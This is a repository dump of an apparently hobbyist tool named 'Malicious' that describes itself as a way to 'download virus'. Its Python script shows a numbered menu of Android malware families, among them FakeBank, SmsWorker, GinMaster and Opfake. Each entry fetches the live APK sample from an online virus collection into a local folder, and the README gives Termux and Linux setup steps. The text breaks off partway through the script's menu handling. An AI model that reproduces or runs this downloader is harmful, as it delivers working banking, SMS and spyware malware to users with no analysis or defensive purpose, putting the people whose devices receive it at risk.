├── Create Virus ├── .gitignore ├── Android │ └── DONT CHANGE NAME THIS FOLDER ├── LICENSE ├── Macosx │ └── DONT CHANGE NAME THIS FOLDER ├── Pdf-autorun-windows │ └── DONT CHANGE NAME THIS FOLDER ├── README.md ├── Shell-virus │ └── DONT CHANGE NAME THIS FOLDER ├── Windows │ └── DONT CHANGE NAME THIS FOLDER ├── Worm-and-Bombzip │ └── DONT CHANGE NAME THIS FOLDER ├── image │ ├── Android.jpg │ ├── Test │ └── ss.jpg ├── malicious.py └── requirements.txt ├── README.md └── Tool X ├── .github └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── .gitignore ├── LICENSE ├── README.md ├── Tool-X.py ├── __init__.py ├── _config.yml ├── core ├── Screenshot_2020-05-17-20-17-56.png ├── Tool-X ├── cat.json ├── data.json ├── toolx ├── toolx.png └── toolx_cat.png ├── install ├── install.aex ├── install.py ├── modules ├── __init__.py ├── logo.py ├── menu.py └── system.py └── requirements.txt /Create Virus/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /Create Virus/Android/DONT CHANGE NAME THIS FOLDER: -------------------------------------------------------------------------------- 1 | WARNING 2 | Dont Change name this folder 3 | -------------------------------------------------------------------------------- /Create Virus/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Hider5 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Create Virus/Macosx/DONT CHANGE NAME THIS FOLDER: -------------------------------------------------------------------------------- 1 | WARNING 2 | Dont Change name this folder 3 | -------------------------------------------------------------------------------- /Create Virus/Pdf-autorun-windows/DONT CHANGE NAME THIS FOLDER: -------------------------------------------------------------------------------- 1 | WARNING 2 | Dont Change name this folder 3 | -------------------------------------------------------------------------------- /Create Virus/README.md: -------------------------------------------------------------------------------- 1 | # Malicious 2 | ![](https://img.shields.io/badge/Python-2.7/2.6-yellowgreen.svg) 3 | ![](https://img.shields.io/badge/version-1.1-brightgreen.svg) 4 | ## Requirements pip2 and gem 5 | ![](https://img.shields.io/badge/pip2-requests%20&%20tqdm-brightgreen.svg) 6 | ![](https://img.shields.io/badge/gem-lolcat-blue.svg) 7 | 8 | 9 | ![alt text](https://github.com/Hider5/Malicious/blob/master/image/ss.jpg) 10 | 11 | ### Installation Termux 12 | ``` 13 | $termux-setup-storage 14 | $cd /sdcard 15 | $pkg install git 16 | $pkg install python2 17 | $pkg install ruby 18 | $gem install lolcat 19 | $git clone https://github.com/Hider5/Malicious 20 | $cd Malicious 21 | $pip2 install -r requirements.txt 22 | $python2 malicious.py 23 | ``` 24 | *after download virus open your file explorer* 25 | 26 | *find folder Malicious and open it* 27 | 28 | *chose and open folder Android if you download virus Android* 29 | ### Installation Linux 30 | ``` 31 | $apt-get install git 32 | $apt-get install python2 ruby 33 | $gem install lolcat 34 | $git clone https://github.com/Hider5/Malicious 35 | $cd Malicious 36 | $pip2 install -r requirements.txt 37 | $python2 malicious.py 38 | ``` 39 | -------------------------------------------------------------------------------- /Create Virus/Shell-virus/DONT CHANGE NAME THIS FOLDER: -------------------------------------------------------------------------------- 1 | WARNING 2 | Dont Change name this folder 3 | -------------------------------------------------------------------------------- /Create Virus/Windows/DONT CHANGE NAME THIS FOLDER: -------------------------------------------------------------------------------- 1 | WARNING 2 | Dont Change name this folder 3 | -------------------------------------------------------------------------------- /Create Virus/Worm-and-Bombzip/DONT CHANGE NAME THIS FOLDER: -------------------------------------------------------------------------------- 1 | WARNING 2 | Dont Change name this folder 3 | -------------------------------------------------------------------------------- /Create Virus/image/Android.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hoangmanhkhiem/Python/7ec85e3f5453e8d04ccf451aff66ec9208658d4a/Create Virus/image/Android.jpg -------------------------------------------------------------------------------- /Create Virus/image/Test: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Create Virus/image/ss.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hoangmanhkhiem/Python/7ec85e3f5453e8d04ccf451aff66ec9208658d4a/Create Virus/image/ss.jpg -------------------------------------------------------------------------------- /Create Virus/malicious.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | #####DONT CHANGE THIS######## 4 | import sys,os,platform 5 | from time import * 6 | x = platform.system() 7 | import requests 8 | from tqdm import tqdm 9 | #--- Color ---# 10 | W = '\033[0m' # white (default) 11 | R = '\033[31m' # red 12 | G = '\033[1;32m' # green bold 13 | O = '\033[33m' # orange 14 | B = '\033[34m' # blue 15 | P = '\033[35m' # purple 16 | C = '\033[36m' # cyan 17 | GR = '\033[37m' # gray 18 | fun = "Download Succes ^_^" 19 | 20 | now = strftime("%T") 21 | bulan = strftime("%B") 22 | tahun = strftime("%Y") 23 | #--- Def menu ---# 24 | def banner(): 25 | os.system('printf "\t\t_ _ ____ _ _ ____ _ ____ _ _ ____\n\t\t|\/| |__| | | | | | | | | [__ \n\t\t| | | | |___ | |___ | |__| |__| ___]\n\n" | lolcat') 26 | #print(""+R+"I "+C+"████╗ ████║██╔══██╗██║ ██║██╔════╝██║██╔═══██╗██║ ██║██╔════╝ "+R+"I") 27 | #print(""+R+"R "+C+"██╔████╔██║███████║██║ ██║██║ ██║██║ ██║██║ ██║███████╗ "+R+"R") 28 | # print(""+R+"U "+C+"██║╚██╔╝██║██╔══██║██║ ██║██║ ██║██║ ██║██║ ██║╚════██║ "+R+"U") 29 | # print(""+R+"S "+C+"██║ ╚═╝ ██║██║ ██║███████╗██║╚██████╗██║╚██████╔╝╚██████╔╝███████║ "+R+"S") 30 | # print(""+R+"! "+C+"╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═════╝╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ "+R+"!") 31 | def about(): 32 | print("\t\t"+B+"<<<<<<| "+R+"About Tool "+B+"|>>>>>>\n") 33 | print("\t"+G+"Made"+B+" with full"+R+" <3"+B+"\t\t") 34 | print("\tAuthor : K19\t\t\t") 35 | print("\tVersion : 1.1\t\t\t") 36 | print("\tTeam : "+R+"LoOlzec Security") 37 | print("\t"+B+"Thanks to Deray") 38 | menu() 39 | 40 | def banner2(): 41 | print(""+O+"") 42 | 43 | def fontcolor(): 44 | print(""+W+"") 45 | #######DONT CHANGE THIS######### 46 | 47 | #################### START ANDROID 48 | def Vandroid(): 49 | print(""+O+"["+R+"1"+O+"] Agent\t\t["+R+"15"+O+"] Elite\t\t["+R+"29"+O+"] Prasesfee") 50 | print(""+O+"["+R+"2"+O+"] Badnews\t\t["+R+"16"+O+"] Omigo\t\t["+R+"30"+O+"] RecipeSmart") 51 | print(""+O+"["+R+"3"+O+"] Bios\t\t["+R+"17"+O+"] Opfake\t\t["+R+"31"+O+"] Romaticpos") 52 | print(""+O+"["+R+"4"+O+"] BlatanSMS\t\t["+R+"18"+O+"] SmsWorker\t\t["+R+"32"+O+"] Statetss") 53 | print(""+O+"["+R+"5"+O+"] BrainTest\t\t["+R+"19"+O+"] Vietcon\t\t["+R+"33"+O+"] Thinking") 54 | print(""+O+"["+R+"6"+O+"] Claco\t\t["+R+"20"+O+"] Candycorn\t\t["+R+"34"+O+"] Crd") 55 | print(""+O+"["+R+"7"+O+"] DropDialer\t\t["+R+"21"+O+"] Cat\t\t["+R+"35"+O+"] Dendroid") 56 | print(""+O+"["+R+"8"+O+"] FakeBank\t\t["+R+"22"+O+"] Chistescortos\t["+R+"36"+O+"] Ds") 57 | print(""+O+"["+R+"9"+O+"] FakeCMCC\t\t["+R+"23"+O+"] Chistespicanticos\t["+R+"37"+O+"] Facebook") 58 | print(""+O+"["+R+"10"+O+"] FakeDoc\t\t["+R+"24"+O+"] ComFunnys\t\t["+R+"38"+O+"] Fakeav") 59 | print(""+O+"["+R+"11"+O+"] FakeValidation\t["+R+"25"+O+"] ComImagePets\t["+R+"39"+O+"] ArtStation") 60 | print(""+O+"["+R+"12"+O+"] Fobus\t\t["+R+"26"+O+"] ComKitchen\t\t["+R+"40"+O+"] MusicPlayer") 61 | print(""+O+"["+R+"13"+O+"] GinMaster\t\t["+R+"27"+O+"] ComLaughtter\t["+R+"41"+O+"] Settings") 62 | print(""+O+"["+R+"14"+O+"] Masnu\t\t["+R+"28"+O+"] Prasesamor\t\t["+R+"42"+O+"] Back") 63 | 64 | try: 65 | menu1 = input("Input Number > "+R+"") 66 | if menu1 == 1:#############done 67 | print(""+G+"") 68 | chunk_size = 1024 69 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Agent.apk?raw=true' 70 | r = requests.get(url, stream = True) 71 | size = int(r.headers['content-length']) 72 | filename = url.split('/')[-1] 73 | with open(filename, 'wb') as f: 74 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 75 | f.write(data) 76 | os.system("mv 'Agent.apk?raw=true' Android/Agent.apk") 77 | print(fun)######done 78 | 79 | elif menu1 == 2:#####done 80 | print(""+G+"") 81 | chunk_size = 1024 82 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/BadNews.A.apk?raw=true' 83 | r = requests.get(url, stream = True) 84 | size = int(r.headers['content-length']) 85 | filename = url.split('/')[-1] 86 | with open(filename, 'wb') as f: 87 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 88 | f.write(data) 89 | os.system("mv 'BadNews.A.apk?raw=true' Android/BadNews.apk") 90 | print(fun)#######done 91 | 92 | elif menu1 == 3:#####done 93 | print(""+G+"") 94 | chunk_size = 1024 95 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Bios.NativeMaliciousCode.apk?raw=true' 96 | r = requests.get(url, stream = True) 97 | size = int(r.headers['content-length']) 98 | filename = url.split('/')[-1] 99 | with open(filename, 'wb') as f: 100 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 101 | f.write(data) 102 | os.system("mv 'Bios.NativeMaliciousCode.apk?raw=true' Android/Bios.apk") 103 | print(fun)#####done 104 | 105 | elif menu1 == 4:########done 106 | print(""+G+"") 107 | chunk_size = 1024 108 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Blatantsms.apk?raw=true' 109 | r = requests.get(url, stream = True) 110 | size = int(r.headers['content-length']) 111 | filename = url.split('/')[-1] 112 | with open(filename, 'wb') as f: 113 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 114 | f.write(data) 115 | os.system("mv 'Blatantsms.apk?raw=true' Android/Blatantsms.apk") 116 | print(fun)#####done 117 | 118 | elif menu1 == 5:#####done 119 | print(""+G+"") 120 | chunk_size = 1024 121 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/BrainTest.apk?raw=true' 122 | r = requests.get(url, stream = True) 123 | size = int(r.headers['content-length']) 124 | filename = url.split('/')[-1] 125 | with open(filename, 'wb') as f: 126 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 127 | f.write(data) 128 | os.system("mv 'BrainTest.apk?raw=true' Android/BrainTest.apk") 129 | print(fun)#####done 130 | 131 | elif menu1 == 6:##########done 132 | print(""+G+"") 133 | chunk_size = 1024 134 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Claco.A.apk?raw=true' 135 | r = requests.get(url, stream = True) 136 | size = int(r.headers['content-length']) 137 | filename = url.split('/')[-1] 138 | with open(filename, 'wb') as f: 139 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 140 | f.write(data) 141 | os.system("mv 'Claco.A.apk?raw=true' Android/Claco.apk") 142 | print(fun)#####done 143 | 144 | elif menu1 == 7:####done 145 | print(""+G+"") 146 | chunk_size = 1024 147 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Dropdialer.apk?raw=true' 148 | r = requests.get(url, stream = True) 149 | size = int(r.headers['content-length']) 150 | filename = url.split('/')[-1] 151 | with open(filename, 'wb') as f: 152 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 153 | f.write(data) 154 | os.system("mv 'Dropdialer.apk?raw=true' Android/DropDialer.apk") 155 | print(fun)#####done 156 | 157 | elif menu1 == 8:#####done 158 | print(""+G+"") 159 | chunk_size = 1024 160 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeBank.B.apk?raw=true' 161 | r = requests.get(url, stream = True) 162 | size = int(r.headers['content-length']) 163 | filename = url.split('/')[-1] 164 | with open(filename, 'wb') as f: 165 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 166 | f.write(data) 167 | os.system("mv 'FakeBank.B.apk?raw=true' Android/FakeBank.apk") 168 | print(fun)#####done 169 | 170 | elif menu1 == 9:######done 171 | print(""+G+"") 172 | chunk_size = 1024 173 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeCMCC.A.apk?raw=true' 174 | r = requests.get(url, stream = True) 175 | size = int(r.headers['content-length']) 176 | filename = url.split('/')[-1] 177 | with open(filename, 'wb') as f: 178 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 179 | f.write(data) 180 | os.system("mv 'FakeCMCC.A.apk?raw=true' Android/FakeCMCC.apk") 181 | print(fun)#####done 182 | 183 | elif menu1 == 10:#####done 184 | print(""+G+"") 185 | chunk_size = 1024 186 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeDoc.apk?raw=true' 187 | r = requests.get(url, stream = True) 188 | size = int(r.headers['content-length']) 189 | filename = url.split('/')[-1] 190 | with open(filename, 'wb') as f: 191 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 192 | f.write(data) 193 | os.system("mv 'FakeDoc.apk?raw=true' Android/FakeDoc.apk") 194 | print(fun)#####done 195 | 196 | elif menu1 == 11:#####done 197 | print(""+G+"") 198 | chunk_size = 1024 199 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeValidation.apk?raw=true' 200 | r = requests.get(url, stream = True) 201 | size = int(r.headers['content-length']) 202 | filename = url.split('/')[-1] 203 | with open(filename, 'wb') as f: 204 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 205 | f.write(data) 206 | os.system("mv 'FakeValidation.apk?raw=true' Android/FakeValidation.apk") 207 | print(fun)#####done 208 | 209 | elif menu1 == 12:####done 210 | print(""+G+"") 211 | chunk_size = 1024 212 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Fobus.apk?raw=true' 213 | r = requests.get(url, stream = True) 214 | size = int(r.headers['content-length']) 215 | filename = url.split('/')[-1] 216 | with open(filename, 'wb') as f: 217 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 218 | f.write(data) 219 | os.system("mv 'Fobus.apk?raw=true' Android/Fobus.apk") 220 | print(fun)#####done 221 | 222 | elif menu1 == 13:####done 223 | print(""+G+"") 224 | chunk_size = 1024 225 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/GinMaster.Z.AdvancedObfuscation.apk?raw=true' 226 | r = requests.get(url, stream = True) 227 | size = int(r.headers['content-length']) 228 | filename = url.split('/')[-1] 229 | with open(filename, 'wb') as f: 230 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 231 | f.write(data) 232 | os.system("mv 'GinMaster.Z.AdvancedObfuscation.apk?raw=true' Android/GinMaster.apk") 233 | print(fun)#####done 234 | 235 | elif menu1 == 14:###done 236 | print(""+G+"") 237 | chunk_size = 1024 238 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Masnu.apk?raw=true' 239 | r = requests.get(url, stream = True) 240 | size = int(r.headers['content-length']) 241 | filename = url.split('/')[-1] 242 | with open(filename, 'wb') as f: 243 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 244 | f.write(data) 245 | os.system("mv 'Masnu.apk?raw=true' Android/Masnu.apk") 246 | print(fun)#####done 247 | 248 | elif menu1 == 15:####done 249 | print(""+G+"") 250 | chunk_size = 1024 251 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Minecraft2.apk?raw=true' 252 | r = requests.get(url, stream = True) 253 | size = int(r.headers['content-length']) 254 | filename = url.split('/')[-1] 255 | with open(filename, 'wb') as f: 256 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 257 | f.write(data) 258 | os.system("mv 'Minecraft2.apk?raw=true' Android/Elite.apk") 259 | print(fun)#####done 260 | 261 | elif menu1 == 16:####done 262 | print(""+G+"") 263 | chunk_size = 1024 264 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Omigo.apk?raw=true' 265 | r = requests.get(url, stream = True) 266 | size = int(r.headers['content-length']) 267 | filename = url.split('/')[-1] 268 | with open(filename, 'wb') as f: 269 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 270 | f.write(data) 271 | os.system("mv 'Omigo.apk?raw=true' Android/Omigo.apk") 272 | print(fun)#####done 273 | 274 | elif menu1 == 17:####done 275 | print(""+G+"") 276 | chunk_size = 1024 277 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Opfake.apk?raw=true' 278 | r = requests.get(url, stream = True) 279 | size = int(r.headers['content-length']) 280 | filename = url.split('/')[-1] 281 | with open(filename, 'wb') as f: 282 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 283 | f.write(data) 284 | os.system("mv 'Opfake.apk?raw=true' Android/Opfake.apk") 285 | print(fun)#####done 286 | 287 | elif menu1 == 18:####done 288 | print(""+G+"") 289 | chunk_size = 1024 290 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/SmsWorker.apk?raw=true' 291 | r = requests.get(url, stream = True) 292 | size = int(r.headers['content-length']) 293 | filename = url.split('/')[-1] 294 | with open(filename, 'wb') as f: 295 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 296 | f.write(data) 297 | os.system("mv 'SmsWorker.apk?raw=true' Android/SmsWorker.apk") 298 | print(fun)#####done 299 | 300 | elif menu1 == 19:####done 301 | print(""+G+"") 302 | chunk_size = 1024 303 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Vietcon.apk?raw=true' 304 | r = requests.get(url, stream = True) 305 | size = int(r.headers['content-length']) 306 | filename = url.split('/')[-1] 307 | with open(filename, 'wb') as f: 308 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 309 | f.write(data) 310 | os.system("mv 'Vietcon.apk?raw=true' Android/Vietcon.apk") 311 | print(fun)#####done 312 | 313 | elif menu1 == 20:####done 314 | print(""+G+"") 315 | chunk_size = 1024 316 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/candy_corn.apk?raw=true' 317 | r = requests.get(url, stream = True) 318 | size = int(r.headers['content-length']) 319 | filename = url.split('/')[-1] 320 | with open(filename, 'wb') as f: 321 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 322 | f.write(data) 323 | os.system("mv 'candy_corn.apk?raw=true' Android/Candycorn.apk") 324 | print(fun)#####done 325 | 326 | elif menu1 == 21:####done 327 | print(""+G+"") 328 | chunk_size = 1024 329 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/cat.apk?raw=true' 330 | r = requests.get(url, stream = True) 331 | size = int(r.headers['content-length']) 332 | filename = url.split('/')[-1] 333 | with open(filename, 'wb') as f: 334 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 335 | f.write(data) 336 | os.system("mv 'cat.apk?raw=true' Android/Cat.apk") 337 | print(fun)#####done 338 | 339 | elif menu1 == 22:####done 340 | print(""+G+"") 341 | chunk_size = 1024 342 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/chistescortos.apk?raw=true' 343 | r = requests.get(url, stream = True) 344 | size = int(r.headers['content-length']) 345 | filename = url.split('/')[-1] 346 | with open(filename, 'wb') as f: 347 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 348 | f.write(data) 349 | os.system("mv 'chistescortos.apk?raw=true' Android/Chistescortos.apk") 350 | print(fun)#####done 351 | 352 | elif menu1 == 23:####done 353 | print(""+G+"") 354 | chunk_size = 1024 355 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/chistespicanticos.apk?raw=true' 356 | r = requests.get(url, stream = True) 357 | size = int(r.headers['content-length']) 358 | filename = url.split('/')[-1] 359 | with open(filename, 'wb') as f: 360 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 361 | f.write(data) 362 | os.system("mv 'chistespicanticos.apk?raw=true' Android/Chistespicanticos.apk") 363 | print(fun)#####done 364 | 365 | elif menu1 == 24:####done 366 | print(""+G+"") 367 | chunk_size = 1024 368 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.funnyys.apk?raw=true' 369 | r = requests.get(url, stream = True) 370 | size = int(r.headers['content-length']) 371 | filename = url.split('/')[-1] 372 | with open(filename, 'wb') as f: 373 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 374 | f.write(data) 375 | os.system("mv 'com.funnyys.apk?raw=true' Android/ComFunnys.apk") 376 | print(fun)#####done 377 | 378 | elif menu1 == 25:####done 379 | print(""+G+"") 380 | chunk_size = 1024 381 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.imagepets.apk?raw=true' 382 | r = requests.get(url, stream = True) 383 | size = int(r.headers['content-length']) 384 | filename = url.split('/')[-1] 385 | with open(filename, 'wb') as f: 386 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 387 | f.write(data) 388 | os.system("mv 'com.imagepets.apk?raw=true' Android/ComImagePets.apk") 389 | print(fun)#####done 390 | 391 | elif menu1 == 26:####done 392 | print(""+G+"") 393 | chunk_size = 1024 394 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.kitchenn.apk?raw=true' 395 | r = requests.get(url, stream = True) 396 | size = int(r.headers['content-length']) 397 | filename = url.split('/')[-1] 398 | with open(filename, 'wb') as f: 399 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 400 | f.write(data) 401 | os.system("mv 'com.kitchenn.apk?raw=true' Android/ComKitchen.apk") 402 | print(fun)#####done 403 | 404 | elif menu1 == 27:####done 405 | print(""+G+"") 406 | chunk_size = 1024 407 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.laughtter.apk?raw=true' 408 | r = requests.get(url, stream = True) 409 | size = int(r.headers['content-length']) 410 | filename = url.split('/')[-1] 411 | with open(filename, 'wb') as f: 412 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 413 | f.write(data) 414 | os.system("mv 'com.laughtter.apk?raw=true' Android/ComLaughtter.apk") 415 | print(fun)#####done 416 | 417 | elif menu1 == 28:####done 418 | print(""+G+"") 419 | chunk_size = 1024 420 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.prasesamor.apk?raw=true' 421 | r = requests.get(url, stream = True) 422 | size = int(r.headers['content-length']) 423 | filename = url.split('/')[-1] 424 | with open(filename, 'wb') as f: 425 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 426 | f.write(data) 427 | os.system("mv 'com.prasesamor.apk?raw=true' Android/Prasesamor.apk") 428 | print(fun)#####done 429 | 430 | elif menu1 == 29:#####done 431 | print(""+G+"") 432 | chunk_size = 1024 433 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.prasesfee.apk?raw=true' 434 | r = requests.get(url, stream = True) 435 | size = int(r.headers['content-length']) 436 | filename = url.split('/')[-1] 437 | with open(filename, 'wb') as f: 438 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 439 | f.write(data) 440 | os.system("mv 'com.prasesfee.apk?raw=true' Android/Prasesfee.apk") 441 | print(fun)#####done 442 | 443 | elif menu1 == 30:####done 444 | print(""+G+"") 445 | chunk_size = 1024 446 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.recipesmart.apk?raw=true' 447 | r = requests.get(url, stream = True) 448 | size = int(r.headers['content-length']) 449 | filename = url.split('/')[-1] 450 | with open(filename, 'wb') as f: 451 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 452 | f.write(data) 453 | os.system("mv 'com.recipesmart.apk?raw=true' Android/Recipesmart.apk") 454 | print(fun)#####done 455 | 456 | elif menu1 == 31:####done 457 | print(""+G+"") 458 | chunk_size = 1024 459 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.romaticpos.apk?raw=true' 460 | r = requests.get(url, stream = True) 461 | size = int(r.headers['content-length']) 462 | filename = url.split('/')[-1] 463 | with open(filename, 'wb') as f: 464 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 465 | f.write(data) 466 | os.system("mv 'com.romaticpos.apk?raw=true' Android/Romaticpos.apk") 467 | print(fun)#####done 468 | 469 | elif menu1 == 32:####done 470 | print(""+G+"") 471 | chunk_size = 1024 472 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.statetss.apk?raw=true' 473 | r = requests.get(url, stream = True) 474 | size = int(r.headers['content-length']) 475 | filename = url.split('/')[-1] 476 | with open(filename, 'wb') as f: 477 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 478 | f.write(data) 479 | os.system("mv 'com.statetss.apk?raw=true' Android/Statetss.apk") 480 | print(fun)#####done 481 | 482 | elif menu1 == 33:####done 483 | print(""+G+"") 484 | chunk_size = 1024 485 | url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.thinkking.apk?raw=true' 486 | r = requests.get(url, stream = True) 487 | size = int(r.headers['content-length']) 488 | filename = url.split('/')[-1] 489 | with open(filename, 'wb') as f: 490 | for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'): 491 | f.write(data) 492 | os.system("mv 'com.thinkking.apk?raw=true' Android/Thinkking.apk") 493 | print(fun)#####done 494 | 495 | elif menu1 == 34:####done 496 | print(""+G+"") 497 | 